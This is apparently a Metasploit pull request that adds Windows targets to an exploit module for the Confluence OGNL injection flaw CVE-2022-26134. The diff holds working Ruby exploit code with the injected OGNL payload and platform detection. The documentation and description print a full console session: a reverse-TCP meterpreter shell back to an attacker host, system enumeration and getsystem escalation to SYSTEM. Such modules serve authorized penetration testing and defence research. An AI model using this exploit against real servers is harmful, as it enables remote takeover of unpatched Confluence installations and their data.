### PR TITLE
Add a Windows target for Confluence

### DIFF
--- a/documentation/modules/exploit/multi/http/atlassian_confluence_namespace_ognl_injection.md
+++ b/documentation/modules/exploit/multi/http/atlassian_confluence_namespace_ognl_injection.md
@@ -87,4 +87,41 @@ Meterpreter     : python/linux
 meterpreter > 
 ```
 
+### Confluence 7.17.2 on Windows Server 2019
+
+```
+msf6 > use exploit/multi/http/atlassian_confluence_namespace_ognl_injection
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set TARGET Windows\ Command 
+TARGET => Windows Command
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set PAYLOAD cmd/windows/powershell/x64/meterpreter/reverse_tcp
+PAYLOAD => cmd/windows/powershell/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set LHOST 192.168.159.128
+LHOST => 192.168.159.128
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Successfully tested OGNL injection.
+[*] Executing cmd/windows/powershell/x64/meterpreter/reverse_tcp (Windows Command)
+[*] Sending stage (200774 bytes) to 192.168.159.10
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.10:49943) at 2022-06-15 17:22:07 -0400
+
+meterpreter > sysinfo
+Computer        : WIN-3MSP8K2LCGC
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : MSFLAB
+Logged On Users : 9
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\NETWORK SERVICE
+meterpreter > getsystem
+...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
+meterpreter > 
+```
+
 [1]: https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro

--- a/modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb
+++ b/modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'Spencer McIntyre'
         ],
         'References' => [
-          ['CVE', '2021-26084'],
+          ['CVE', '2022-26134'],
           ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'],
           ['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'],
           ['URL', 'https://github.com/jbaines-r7/through_the_wire'],
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2022-06-02',
         'License' => MSF_LICENSE,
-        'Platform' => ['unix', 'linux'],
+        'Platform' => ['unix', 'linux', 'win'],
         'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'Privileged' => false,
         'Targets' => [
@@ -51,6 +51,22 @@ class MetasploitModule < Msf::Exploit::Remote
             'Linux Dropper',
             {
               'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :dropper
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :cmd
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Platform' => 'win',
               'Arch' => [ARCH_X86, ARCH_X64],
               'Type' => :dropper
             }
@@ -79,7 +95,21 @@ class MetasploitModule < Msf::Exploit::Remote
 
     vprint_status("Detected Confluence version: #{version}")
     header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
-    res = inject_ognl('', header: header) # empty command works for testing, the header will be set
+    ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
+      ${
+        Class.forName("com.opensymphony.webwork.ServletActionContext")
+          .getMethod("getResponse",null)
+          .invoke(null,null)
+          .setHeader(
+            "#{header}",
+            Class.forName("javax.script.ScriptEngineManager")
+              .newInstance()
+              .getEngineByName("js")
+              .eval("java.lang.System.getProperty('os.name')")
+            )
+      }
+    OGNL
+    res = inject_ognl(ognl)
 
     return CheckCode::Unknown unless res
 
@@ -87,6 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Safe('Failed to test OGNL injection.')
     end
 
+    vprint_status("Detected target platform: #{res.headers[header]}")
     CheckCode::Vulnerable('Successfully tested OGNL injection.')
   end
 
@@ -119,26 +150,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_command(cmd, _opts = {})
     header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
-    res = inject_ognl(cmd, header: header)
-
-    unless res && res.headers.include?(header)
-      fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")
-    end
-
-    vprint_good("Successfully executed command: #{cmd}")
-    res.headers[header]
-  end
-
-  def inject_ognl(cmd, header:)
-    send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl_payload(cmd, header: header)), 'dashboard.action'),
-      'headers' => { header => cmd }
-    )
-  end
-
-  def ognl_payload(_cmd, header:)
-    <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
+    ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
       ${
         Class.forName("com.opensymphony.webwork.ServletActionContext")
           .getMethod("getResponse",null)
@@ -154,5 +166,20 @@ class MetasploitModule < Msf::Exploit::Remote
             )
       }
     OGNL
+    res = inject_ognl(ognl, 'headers' => { header => cmd })
+
+    unless res && res.headers.include?(header)
+      fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")
+    end
+
+    vprint_good("Successfully executed command: #{cmd}")
+    res.headers[header]
+  end
+
+  def inject_ognl(ognl, opts = {})
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl), 'dashboard.action')
+    }.merge(opts))
   end
 end

--- a/modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb
+++ b/modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb
@@ -90,10 +90,24 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    version = get_confluence_version
-    return CheckCode::Unknown unless version
+    confluence_version = get_confluence_version
+    return CheckCode::Unknown unless confluence_version
 
-    vprint_status("Detected Confluence version: #{version}")
+    vprint_status("Detected Confluence version: #{confluence_version}")
+
+    confluence_platform = get_confluence_platform
+    unless confluence_platform
+      return CheckCode::Safe('Failed to test OGNL injection.')
+    end
+
+    vprint_status("Detected target platform: #{confluence_platform}")
+    CheckCode::Vulnerable('Successfully tested OGNL injection.')
+  end
+
+  def get_confluence_platform
+    # this method gets the platform by exploiting CVE-2022-26134
+    return @confluence_platform if @confluence_platform
+
     header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
     ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
       ${
@@ -110,15 +124,9 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     OGNL
     res = inject_ognl(ognl)
+    return nil unless res
 
-    return CheckCode::Unknown unless res
-
-    unless res && res.headers.include?(header)
-      return CheckCode::Safe('Failed to test OGNL injection.')
-    end
-
-    vprint_status("Detected target platform: #{res.headers[header]}")
-    CheckCode::Vulnerable('Successfully tested OGNL injection.')
+    res.headers[header]
   end
 
   def get_confluence_version
@@ -138,6 +146,15 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    confluence_platform = get_confluence_platform
+    unless confluence_platform
+      fail_with(Failure::NotVulnerable, 'The target is not vulnerable.')
+    end
+
+    unless confluence_platform.downcase.start_with?('win') == (target['Platform'] == 'win')
+      fail_with(Failure::NoTarget, "The target platform '#{confluence_platform}' is incompatible with '#{target.name}'")
+    end
+
     print_status("Executing #{payload_instance.refname} (#{target.name})")
 
     case target['Type']


### PR DESCRIPTION
This builds on my previous PR #16644 by adding Windows targets. It also fixes an issue where the check method would fail to properly identify that Windows targets were even vulnerable due to how the command was being executed. Now a dedicated OGNL snippet that leaks the system platform will be used for checking the presence of the vulnerability. As an added benefit, the platform is then compared to the configured `TARGET` to check for compatibility.

Tested Confluence 7.17.2 on Windows Server 2019 with both the Dropper and Command targets.

Fixes #16649.

## Verification

List the steps needed to make sure this thing works

- [ ] Install a [vulnerable confluence](https://www.atlassian.com/software/confluence/download-archives) server on Windows
- [ ] A database will be required, install that or use docker on another host
- [ ] Start msfconsole
- [ ] Run: `use exploit/multi/http/atlassian_confluence_namespace_ognl_injection'
- [ ] Set the RHOSTS, PAYLOAD and payload-related options
- [ ] Run the module

## Demo

Note that Confluence on Windows by default runs as NT AUTHORITY\NETWORK SERVICE which thanks to the RPCSS technique added in #14030 might as well be NT AUTHORITY\SYSTEM 🎉 .

```
msf6 > use exploit/multi/http/atlassian_confluence_namespace_ognl_injection
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set RHOSTS 192.168.159.10
RHOSTS => 192.168.159.10
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set TARGET Windows\ Command 
TARGET => Windows Command
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set PAYLOAD cmd/windows/powershell/x64/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/powershell/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully tested OGNL injection.
[*] Executing cmd/windows/powershell/x64/meterpreter/reverse_tcp (Windows Command)
[*] Sending stage (200774 bytes) to 192.168.159.10
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.10:49943) at 2022-06-15 17:22:07 -0400
meterpreter > sysinfo
Computer        : WIN-3MSP8K2LCGC
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > getsystem
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > 
```